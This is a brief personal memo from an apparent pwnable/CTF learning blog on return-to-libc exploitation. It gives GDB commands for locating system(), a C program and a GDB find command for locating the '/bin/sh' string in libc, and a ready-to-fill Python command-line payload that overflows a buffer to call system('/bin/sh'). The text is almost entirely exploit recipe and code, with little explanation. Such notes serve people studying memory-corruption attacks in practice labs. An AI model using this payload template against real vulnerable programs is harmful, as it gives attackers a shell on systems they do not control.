[Library / Pwnable] Return To Libc Memo
RevDev
2015. 8. 30. 21:14
[System_Addr - GDB]
>b *func
>r
>p system
[Export Exploit_Addr 1]
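#include <stdio.h>
#include <string.h>

/* Assumes a 32-bit build, so a pointer fits in unsigned int. */
int main()
{
    unsigned int addr;
    printf("\nSystem Addr : 0x");
    scanf("%x", &addr);
    /* Scan upward from system(); 8 bytes = "/bin/sh" plus its terminating NUL. */
    while (memcmp((void*)addr, "/bin/sh", 8)) addr++;
    printf("\n<Calculated Result>\nExploit Addr : 0x%x\n\n", addr);
    return 0;
}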
[Export Exploit_Addr 2]
>find &system, +99999999, "/bin/sh"
[Payload Example]
./filename `python -c 'print "\x90"*SizeOfBuf+"System_Addr"+"\x90"*4+"Exploit_Addr"'`